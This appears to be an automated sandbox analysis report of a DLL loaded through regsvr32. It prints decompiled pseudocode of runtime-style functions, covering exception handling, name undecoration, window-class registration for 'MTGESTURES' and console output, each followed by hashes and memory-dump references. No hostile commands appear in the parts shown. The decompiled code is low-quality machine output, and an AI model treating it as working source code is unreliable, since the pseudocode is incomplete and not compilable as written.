                                                                      				_t46 = _t45 - 0xc0;
                                                                      				if ( *__rcx == 0x80000003) goto 0x8005470c;
                                                                      				E0000000118002DD20(_t27);
                                                                      				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                                      				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x80054727;
                                                                      				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                                      				E0000000118002DD20(_t27);
                                                                      				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x80054727;
                                                                      				if ( *__rcx == 0xe0434f4d) goto 0x80054727;
                                                                      				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                                      				if ( *__rcx == 0xe0434352) goto 0x8005472b;
                                                                      				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                                      				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                                      				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                                      				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                                      				_t19 = E00000001180042514(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                                      				if (_t19 == 0) goto 0x8005472b;
                                                                      				return _t19;
                                                                      			}















                                                                      0x180054668
                                                                      0x18005466b
                                                                      0x18005466f
                                                                      0x180054673
                                                                      0x180054682
                                                                      0x180054686
                                                                      0x18005469c
                                                                      0x18005469e
                                                                      0x1800546a3
                                                                      0x1800546b0
                                                                      0x1800546b4
                                                                      0x1800546bd
                                                                      0x1800546c6
                                                                      0x1800546cf
                                                                      0x1800546d8
                                                                      0x1800546dc
                                                                      0x1800546ec
                                                                      0x1800546f4
                                                                      0x1800546f9
                                                                      0x1800546fe
                                                                      0x180054703
                                                                      0x18005470a
                                                                      0x180054726

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 05c50e9f47ae60411b3e9384734147d771ef74817cd1f49316aecbe33f35136d
                                                                      • Instruction ID: b7c4e19695cd5e2b30e772c001834e07d71610be6b355e6cbfecdf148a214fce
                                                                      • Opcode Fuzzy Hash: 05c50e9f47ae60411b3e9384734147d771ef74817cd1f49316aecbe33f35136d
                                                                      • Instruction Fuzzy Hash: 9C514637A04A888AE7668F65D4803ED77A0F349BCCF148216FE4927B59DF79C689C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 63%
                                                                      			E00000001180052EE4(void* __ecx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                      				signed int _v32;
                                                                      				long long _v40;
                                                                      				char _v48;
                                                                      				signed int* _v56;
                                                                      				void* _t55;
                                                                      				intOrPtr _t60;
                                                                      				void* _t81;
                                                                      				signed int _t102;
                                                                      				void* _t110;
                                                                      				intOrPtr _t112;
                                                                      				signed int* _t117;
                                                                      				intOrPtr* _t137;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				void* _t145;
                                                                      				void* _t159;
                                                                      				void* _t160;
                                                                      
                                                                      				_t110 = _t145;
                                                                      				 *((long long*)(_t110 + 8)) = __rbx;
                                                                      				 *((long long*)(_t110 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t110 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t110 + 0x20)) = __rdi;
                                                                      				_t137 = __rcx;
                                                                      				_t140 = __r9;
                                                                      				_t160 = __r8;
                                                                      				_t143 = __rdx;
                                                                      				E0000000118002DB64(_t55, __r8);
                                                                      				E0000000118002DD20(_t110);
                                                                      				_t117 = _a40;
                                                                      				if ( *((intOrPtr*)(_t110 + 0x40)) != 0) goto 0x80052f66;
                                                                      				if ( *__rcx == 0xe06d7363) goto 0x80052f66;
                                                                      				if ( *__rcx != 0x80000029) goto 0x80052f4a;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80052f4e;
                                                                      				goto 0x80052f4c;
                                                                      				if ( *__rcx == 0x80000026) goto 0x80052f66;
                                                                      				if (( *_t117 & 0x1fffffff) - 0x19930522 < 0) goto 0x80052f66;
                                                                      				if ((_t117[9] & 0x00000001) != 0) goto 0x800530f5;
                                                                      				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80052ffe;
                                                                      				if (_t117[1] == 0) goto 0x800530f5;
                                                                      				if (_a48 != 0) goto 0x800530f5;
                                                                      				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80052feb;
                                                                      				if ( *__rcx != 0x80000026) goto 0x80052fc9;
                                                                      				_t60 = E00000001180051698(_t117, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                                      				if (_t60 - 0xffffffff < 0) goto 0x80053115;
                                                                      				if (_t60 - _t117[1] >= 0) goto 0x80053115;
                                                                      				r9d = _t60;
                                                                      				E00000001180052068(_t110, _t143, __r9, _t117);
                                                                      				goto 0x800530f5;
                                                                      				if ( *_t137 != 0x80000029) goto 0x80052feb;
                                                                      				r9d =  *((intOrPtr*)(_t137 + 0x38));
                                                                      				if (r9d - 0xffffffff < 0) goto 0x80053115;
                                                                      				if (r9d - _t117[1] >= 0) goto 0x80053115;
                                                                      				goto 0x80052fb9;
                                                                      				E00000001180041C2C(r9d - _t117[1], _t110, _t117, __r9, __r9, _t117);
                                                                      				goto 0x800530f5;
                                                                      				if (_t117[3] != 0) goto 0x80053046;
                                                                      				if (( *_t117 & 0x1fffffff) - 0x19930521 < 0) goto 0x80053026;
                                                                      				_t102 = _t117[8];
                                                                      				if (_t102 == 0) goto 0x80053026;
                                                                      				E00000001180042288(_t110);
                                                                      				if (_t102 != 0) goto 0x80053046;
                                                                      				if (( *_t117 & 0x1fffffff) - 0x19930522 < 0) goto 0x800530f5;
                                                                      				if ((_t117[9] >> 0x00000002 & 0x00000001) == 0) goto 0x800530f5;
                                                                      				if ( *_t137 != 0xe06d7363) goto 0x800530bc;
                                                                      				if ( *((intOrPtr*)(_t137 + 0x18)) - 3 < 0) goto 0x800530bc;
                                                                      				if ( *((intOrPtr*)(_t137 + 0x20)) - 0x19930522 <= 0) goto 0x800530bc;
                                                                      				_t112 =  *((intOrPtr*)(_t137 + 0x30));
                                                                      				if ( *((intOrPtr*)(_t112 + 8)) == 0) goto 0x800530bc;
                                                                      				E000000011800422B4(_t112);
                                                                      				if (_t112 +  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x30)) + 8)) == 0) goto 0x800530bc;
                                                                      				_v32 = _a64 & 0x000000ff;
                                                                      				_v40 = _a56;
                                                                      				_v48 = _a48;
                                                                      				_v56 = _t117;
                                                                      				 *0x8007a008(_t159);
                                                                      				goto 0x800530fa;
                                                                      				_v32 = _a56;
                                                                      				_v40 = _a48;
                                                                      				_v48 = _a64;
                                                                      				_v56 = _t117;
                                                                      				E00000001180053BD0(_a48, 0x80000026, _t81, _t137, _t143, _t160, _t140, _t112 +  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x30)) + 8)));
                                                                      				return 1;
                                                                      			}




















                                                                      0x180052ee4
                                                                      0x180052ee7
                                                                      0x180052eeb
                                                                      0x180052eef
                                                                      0x180052ef3
                                                                      0x180052efd
                                                                      0x180052f00
                                                                      0x180052f06
                                                                      0x180052f09
                                                                      0x180052f0c
                                                                      0x180052f11
                                                                      0x180052f16
                                                                      0x180052f2c
                                                                      0x180052f34
                                                                      0x180052f38
                                                                      0x180052f3e
                                                                      0x180052f48
                                                                      0x180052f4c
                                                                      0x180052f5a
                                                                      0x180052f60
                                                                      0x180052f6a
                                                                      0x180052f74
                                                                      0x180052f82
                                                                      0x180052f8c
                                                                      0x180052f90
                                                                      0x180052f9c
                                                                      0x180052fa4
                                                                      0x180052fad
                                                                      0x180052fb3
                                                                      0x180052fbf
                                                                      0x180052fc4
                                                                      0x180052fcb
                                                                      0x180052fcd
                                                                      0x180052fd5
                                                                      0x180052fdf
                                                                      0x180052fe9
                                                                      0x180052ff4
                                                                      0x180052ff9
                                                                      0x180053002
                                                                      0x180053010
                                                                      0x180053012
                                                                      0x180053016
                                                                      0x180053018
                                                                      0x180053024
                                                                      0x180053032
                                                                      0x180053040
                                                                      0x18005304c
                                                                      0x180053052
                                                                      0x18005305b
                                                                      0x18005305d
                                                                      0x180053065
                                                                      0x180053067
                                                                      0x18005307a
                                                                      0x180053087
                                                                      0x180053099
                                                                      0x1800530a8
                                                                      0x1800530af
                                                                      0x1800530b4
                                                                      0x1800530ba
                                                                      0x1800530c7
                                                                      0x1800530d9
                                                                      0x1800530e7
                                                                      0x1800530eb
                                                                      0x1800530f0
                                                                      0x180053114

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: 37fd1b73c25c18307bfdcea3bbf8adc8c8e2f51e3737b1b619acf889784fe998
                                                                      • Instruction ID: bb870781caa0fddfb62e9aeb9d3cc375bf42e1f2dae1c5bce0e7a02d10eae83d
                                                                      • Opcode Fuzzy Hash: 37fd1b73c25c18307bfdcea3bbf8adc8c8e2f51e3737b1b619acf889784fe998
                                                                      • Instruction Fuzzy Hash: 0251CC321047888AEBB68F21E49539977A0F749BD4F14D126FB8867BD5CF3AD658CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E000000011800307B8(void* __edx, long long __rbx, signed int* __rcx, long long __rsi, void* __r9, void* __r10, long long _a16, long long _a24) {
                                                                      				void* _v8;
                                                                      				signed int _v24;
                                                                      				char _v104;
                                                                      				intOrPtr _v112;
                                                                      				char _v120;
                                                                      				void* _t28;
                                                                      				void* _t31;
                                                                      				signed long long _t40;
                                                                      				signed int* _t45;
                                                                      				intOrPtr* _t48;
                                                                      				long long _t53;
                                                                      				signed int* _t56;
                                                                      				void* _t65;
                                                                      				void* _t69;
                                                                      
                                                                      				_t69 = __r9;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_t40 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v24 = _t40 ^ _t65 - 0x00000090;
                                                                      				_t45 = __rcx;
                                                                      				_t48 =  *0x800738a8; // 0x0
                                                                      				_t31 = __edx;
                                                                      				if ( *_t48 != sil) goto 0x800307fe;
                                                                      				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                      				goto 0x800308b3;
                                                                      				if ( *0x8005fee0 - 0x30 - 9 > 0) goto 0x80030826;
                                                                      				 *0x800738a8 = 0x18005fee1;
                                                                      				E0000000118002E674( *0x8005fee0 - 0x2f, __rcx,  *0x8005fee0 - 0x2f, __r10);
                                                                      				goto 0x800308b6;
                                                                      				E00000001180030570(_t28,  &_v120,  *0x8005fee0 - 0x2f);
                                                                      				_t53 =  *0x800738a8; // 0x0
                                                                      				if (_v112 == sil) goto 0x8003089a;
                                                                      				 *0x800738a8 = _t53 + 1;
                                                                      				if (_t31 != 0x42) goto 0x8003088a;
                                                                      				asm("movsd xmm3, [esp+0x20]");
                                                                      				asm("dec cx");
                                                                      				E0000000118002E29C(_t28, 0x41, _v120,  &_v104,  *0x8005fee0 - 0x2f, "%lf", _t69);
                                                                      				r8b = sil;
                                                                      				_t56 = _t45;
                                                                      				E00000001180036344(_t56,  &_v104);
                                                                      				goto 0x800308b6;
                                                                      				if (_t31 != 0x41) goto 0x8003089a;
                                                                      				asm("movss xmm3, [esp+0x20]");
                                                                      				asm("cvtps2pd xmm3, xmm3");
                                                                      				goto 0x8003085d;
                                                                      				_t58 =  !=  ? __rsi : 0x8005fee0;
                                                                      				asm("sbb eax, eax");
                                                                      				_t45[2] =  ~( *_t56) & 0x00000002;
                                                                      				 *_t45 =  !=  ? __rsi : 0x8005fee0;
                                                                      				return E00000001180002FB0( ~( *_t56) & 0x00000002, _t28, _v24 ^ _t65 - 0x00000090);
                                                                      			}

















                                                                      0x1800307b8
                                                                      0x1800307b8
                                                                      0x1800307bd
                                                                      0x1800307ca
                                                                      0x1800307d4
                                                                      0x1800307dc
                                                                      0x1800307e1
                                                                      0x1800307e8
                                                                      0x1800307ed
                                                                      0x1800307ef
                                                                      0x1800307f9
                                                                      0x180030804
                                                                      0x18003080f
                                                                      0x18003081c
                                                                      0x180030821
                                                                      0x18003082b
                                                                      0x180030830
                                                                      0x18003083c
                                                                      0x180030846
                                                                      0x180030855
                                                                      0x180030857
                                                                      0x18003085d
                                                                      0x180030873
                                                                      0x180030878
                                                                      0x180030880
                                                                      0x180030883
                                                                      0x180030888
                                                                      0x18003088d
                                                                      0x18003088f
                                                                      0x180030895
                                                                      0x180030898
                                                                      0x1800308a5
                                                                      0x1800308ab
                                                                      0x1800308b0
                                                                      0x1800308b3
                                                                      0x1800308dd

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: NameName::
                                                                      • String ID: %lf
                                                                      • API String ID: 1333004437-2891890143
                                                                      • Opcode ID: 785252200d08ce0b36d6befa149bd791d71bae67f57441b7767d8ad6e7421060
                                                                      • Instruction ID: 0d3d5c715f92b0c93880214bd6c947c0677568a0c71167f2f5f39074c0e30c62
                                                                      • Opcode Fuzzy Hash: 785252200d08ce0b36d6befa149bd791d71bae67f57441b7767d8ad6e7421060
                                                                      • Instruction Fuzzy Hash: BC319032604A8895FAA3CB64F8613EA77A4F38DBC4F65C112F99D47655CE3CC6498780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E00000001180001FD0(long long __rcx) {
                                                                      				signed int _v8;
                                                                      				long long _v16;
                                                                      				long long _v24;
                                                                      				long long _v32;
                                                                      				long long _v40;
                                                                      				long long _v48;
                                                                      				long long _v56;
                                                                      				long long _v64;
                                                                      				long long _v68;
                                                                      				long long _v72;
                                                                      				long long _v80;
                                                                      				intOrPtr _v84;
                                                                      				intOrPtr _v88;
                                                                      				long long _v96;
                                                                      				short _v98;
                                                                      				signed long long _t29;
                                                                      				long long _t32;
                                                                      				signed long long _t38;
                                                                      
                                                                      				_t29 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v8 = _t29 ^ _t38;
                                                                      				_v96 = __rcx;
                                                                      				_v88 = 0x50;
                                                                      				_v84 = 3;
                                                                      				_v80 = E000000011800029F0;
                                                                      				_v72 = 0;
                                                                      				_v68 = 0;
                                                                      				_t32 = _v96;
                                                                      				_v64 = _t32;
                                                                      				_v56 = 0;
                                                                      				LoadCursorW(??, ??);
                                                                      				_v48 = _t32;
                                                                      				_v40 = _t32;
                                                                      				_v32 = 0;
                                                                      				_v24 = L"MTGESTURES";
                                                                      				_v16 = 0;
                                                                      				_v98 = RegisterClassExW(??);
                                                                      				E00000001180002FB0(_t23, 0, _v8 ^ _t38);
                                                                      				return _v98;
                                                                      			}





















                                                                      0x180001fd7
                                                                      0x180001fe1
                                                                      0x180001fe9
                                                                      0x180001fee
                                                                      0x180001ff6
                                                                      0x180002005
                                                                      0x18000200a
                                                                      0x180002012
                                                                      0x18000201a
                                                                      0x18000201f
                                                                      0x180002024
                                                                      0x180002036
                                                                      0x18000203c
                                                                      0x180002046
                                                                      0x18000204b
                                                                      0x18000205b
                                                                      0x180002060
                                                                      0x180002074
                                                                      0x180002084
                                                                      0x180002095

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ClassCursorLoadRegister
                                                                      • String ID: MTGESTURES$P
                                                                      • API String ID: 1693014935-3205312668
                                                                      • Opcode ID: 031343648846c16ca326218a4d1e8e48407399d9a89cbb3eb2ba3e9de6e2ea8d
                                                                      • Instruction ID: 37f3a06ee4c5b78251829423988f5c01fffb4bf9f8c3544a85b4a7bdf29d6a98
                                                                      • Opcode Fuzzy Hash: 031343648846c16ca326218a4d1e8e48407399d9a89cbb3eb2ba3e9de6e2ea8d
                                                                      • Instruction Fuzzy Hash: C211D036129B848AE7A0CB10F85439AB7E4F388784F504128F6CD82B68DF7DC558CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 42%
                                                                      			E000000011800483D4(signed int __ecx, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                      				signed short _v80;
                                                                      				void* _v92;
                                                                      				signed int _v96;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				long _v112;
                                                                      				signed int _v120;
                                                                      				long long _v128;
                                                                      				signed int _v136;
                                                                      				void* __rbx;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t108;
                                                                      				long _t117;
                                                                      				signed int _t118;
                                                                      				void* _t123;
                                                                      				signed int _t129;
                                                                      				intOrPtr _t147;
                                                                      				intOrPtr _t148;
                                                                      				void* _t149;
                                                                      				void* _t169;
                                                                      				signed int _t179;
                                                                      				signed long long _t182;
                                                                      				signed long long _t186;
                                                                      				signed long long _t189;
                                                                      				signed long long _t208;
                                                                      				signed int _t209;
                                                                      				void* _t210;
                                                                      				void* _t212;
                                                                      				void* _t228;
                                                                      				signed long long _t229;
                                                                      				signed short* _t230;
                                                                      				void* _t231;
                                                                      				signed short* _t232;
                                                                      
                                                                      				r15d = r8d;
                                                                      				_t186 = __r9;
                                                                      				_t230 = __rdx;
                                                                      				if (r8d == 0) goto 0x800486d1;
                                                                      				if (__rdx != 0) goto 0x8004843b;
                                                                      				 *((char*)(__r9 + 0x38)) = 1;
                                                                      				r8d = 0;
                                                                      				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                      				 *((char*)(__r9 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                      				r9d = 0;
                                                                      				_v128 = __r9;
                                                                      				_v136 = _t209;
                                                                      				E0000000118003AA20(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
                                                                      				goto 0x800486d3;
                                                                      				_t179 = __ecx;
                                                                      				_t189 = __ecx >> 6;
                                                                      				_v120 = _t189;
                                                                      				_t229 = __ecx + __ecx * 8;
                                                                      				if (_t210 - 1 - 1 > 0) goto 0x80048471;
                                                                      				if (( !r15d & 0x00000001) == 0) goto 0x80048404;
                                                                      				if (( *( *((intOrPtr*)(0x80073d10 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x80048487;
                                                                      				r8d = 0x180073d12;
                                                                      				E00000001180057090(0, __r9,  *((intOrPtr*)(0x80073d10 + _t189 * 8)), 0x80073d10, _t210, _t212, __r9);
                                                                      				_v96 = _t209;
                                                                      				if (E00000001180049204(r12d, 0, _t179) == 0) goto 0x800485bd;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(0x80073d10 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x800485bd;
                                                                      				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x800484ce;
                                                                      				E00000001180006E80( *((intOrPtr*)(0x80073d10 + _v120 * 8)), __r9, __r9, _v120, _t210);
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x800484ea;
                                                                      				_t182 =  *((intOrPtr*)(0x80073d10 + _v120 * 8));
                                                                      				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x800485bd;
                                                                      				if (GetConsoleMode(??, ??) == 0) goto 0x800485b2;
                                                                      				if (sil == 0) goto 0x8004858f;
                                                                      				sil = sil - 1;
                                                                      				if (sil - 1 > 0) goto 0x80048656;
                                                                      				_t228 = _t230 + _t231;
                                                                      				_v112 = _t209;
                                                                      				_t232 = _t230;
                                                                      				if (_t230 - _t228 >= 0) goto 0x8004864c;
                                                                      				_v80 =  *_t232 & 0x0000ffff;
                                                                      				_t108 = E000000011800575D0( *_t232 & 0xffff);
                                                                      				_t129 = _v80 & 0x0000ffff;
                                                                      				if (_t108 != _t129) goto 0x80048581;
                                                                      				_t147 = _v108 + 2;
                                                                      				_v108 = _t147;
                                                                      				if (_t129 != 0xa) goto 0x80048572;
                                                                      				if (E000000011800575D0(0xd) != 0xd) goto 0x80048581;
                                                                      				_t148 = _t147 + 1;
                                                                      				_v108 = _t148;
                                                                      				if ( &(_t232[1]) - _t228 >= 0) goto 0x8004864c;
                                                                      				goto 0x80048532;
                                                                      				_v112 = GetLastError();
                                                                      				goto 0x8004864c;
                                                                      				r9d = r15d;
                                                                      				_v136 = __r9;
                                                                      				E000000011800488B0(0xd, r12d, _t148, _t149, __r9,  &_v112, _t230);
                                                                      				asm("movsd xmm0, [eax]");
                                                                      				goto 0x80048651;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(0x80073d10 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x80048619;
                                                                      				_t169 = sil;
                                                                      				if (_t169 == 0) goto 0x80048605;
                                                                      				if (_t169 == 0) goto 0x800485f1;
                                                                      				if (_t148 - 1 != 1) goto 0x80048661;
                                                                      				r9d = r15d;
                                                                      				E00000001180048ED8(_t123, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                      				goto 0x800485a6;
                                                                      				r9d = r15d;
                                                                      				E00000001180048FF4(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
                                                                      				goto 0x800485a6;
                                                                      				r9d = r15d;
                                                                      				E00000001180048DD4(_t123, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                      				goto 0x800485a6;
                                                                      				r8d = r15d;
                                                                      				_v136 = _v136 & _t182;
                                                                      				_v112 = _t182;
                                                                      				_v104 = 0;
                                                                      				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x80048649;
                                                                      				_t117 = GetLastError();
                                                                      				_v112 = _t117;
                                                                      				asm("movsd xmm0, [ebp-0x30]");
                                                                      				asm("movsd [ebp-0x20], xmm0");
                                                                      				if (_t117 != 0) goto 0x800486ca;
                                                                      				_t118 = _v96;
                                                                      				if (_t118 == 0) goto 0x800486a0;
                                                                      				if (_t118 != 5) goto 0x80048690;
                                                                      				 *((char*)(_t186 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
                                                                      				 *((char*)(_t186 + 0x38)) = 1;
                                                                      				 *(_t186 + 0x34) = _t118;
                                                                      				goto 0x80048433;
                                                                      				_t208 = _t186;
                                                                      				E0000000118003C1BC(_v96, _t208);
                                                                      				goto 0x80048433;
                                                                      				if (( *( *((intOrPtr*)(0x80073d10 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x800486b2;
                                                                      				if ( *_t230 == 0x1a) goto 0x800486d1;
                                                                      				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
                                                                      				 *((char*)(_t186 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
                                                                      				 *((char*)(_t186 + 0x38)) = 1;
                                                                      				goto 0x80048433;
                                                                      				goto 0x800486d3;
                                                                      				return 0;
                                                                      			}





































                                                                      0x1800483ea
                                                                      0x1800483f0
                                                                      0x1800483f3
                                                                      0x1800483f9
                                                                      0x180048402
                                                                      0x180048404
                                                                      0x180048409
                                                                      0x18004840c
                                                                      0x180048412
                                                                      0x180048419
                                                                      0x180048421
                                                                      0x180048424
                                                                      0x180048429
                                                                      0x18004842e
                                                                      0x180048436
                                                                      0x18004843b
                                                                      0x18004844b
                                                                      0x18004844f
                                                                      0x180048453
                                                                      0x180048466
                                                                      0x18004846f
                                                                      0x180048477
                                                                      0x18004847e
                                                                      0x180048482
                                                                      0x18004848a
                                                                      0x1800484a0
                                                                      0x1800484af
                                                                      0x1800484b9
                                                                      0x1800484be
                                                                      0x1800484d9
                                                                      0x1800484db
                                                                      0x1800484e4
                                                                      0x1800484ff
                                                                      0x180048508
                                                                      0x18004850e
                                                                      0x180048515
                                                                      0x18004851b
                                                                      0x18004851f
                                                                      0x180048523
                                                                      0x180048529
                                                                      0x180048539
                                                                      0x18004853d
                                                                      0x180048542
                                                                      0x180048549
                                                                      0x18004854b
                                                                      0x18004854e
                                                                      0x180048555
                                                                      0x180048569
                                                                      0x18004856b
                                                                      0x18004856d
                                                                      0x180048579
                                                                      0x18004857f
                                                                      0x180048587
                                                                      0x18004858a
                                                                      0x18004858f
                                                                      0x180048592
                                                                      0x1800485a1
                                                                      0x1800485a6
                                                                      0x1800485ad
                                                                      0x1800485c6
                                                                      0x1800485ca
                                                                      0x1800485cd
                                                                      0x1800485d2
                                                                      0x1800485d7
                                                                      0x1800485dd
                                                                      0x1800485ea
                                                                      0x1800485ef
                                                                      0x1800485f1
                                                                      0x1800485fe
                                                                      0x180048603
                                                                      0x180048605
                                                                      0x180048612
                                                                      0x180048617
                                                                      0x180048624
                                                                      0x180048627
                                                                      0x18004862f
                                                                      0x180048633
                                                                      0x18004863e
                                                                      0x180048640
                                                                      0x180048646
                                                                      0x18004864c
                                                                      0x180048651
                                                                      0x18004866b
                                                                      0x18004866d
                                                                      0x180048672
                                                                      0x180048677
                                                                      0x180048679
                                                                      0x18004867d
                                                                      0x180048684
                                                                      0x180048688
                                                                      0x18004868b
                                                                      0x180048693
                                                                      0x180048696
                                                                      0x18004869b
                                                                      0x1800486aa
                                                                      0x1800486b0
                                                                      0x1800486b2
                                                                      0x1800486b6
                                                                      0x1800486ba
                                                                      0x1800486c1
                                                                      0x1800486c5
                                                                      0x1800486cf
                                                                      0x1800486e3

                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001800487AC), ref: 00000001800484F7
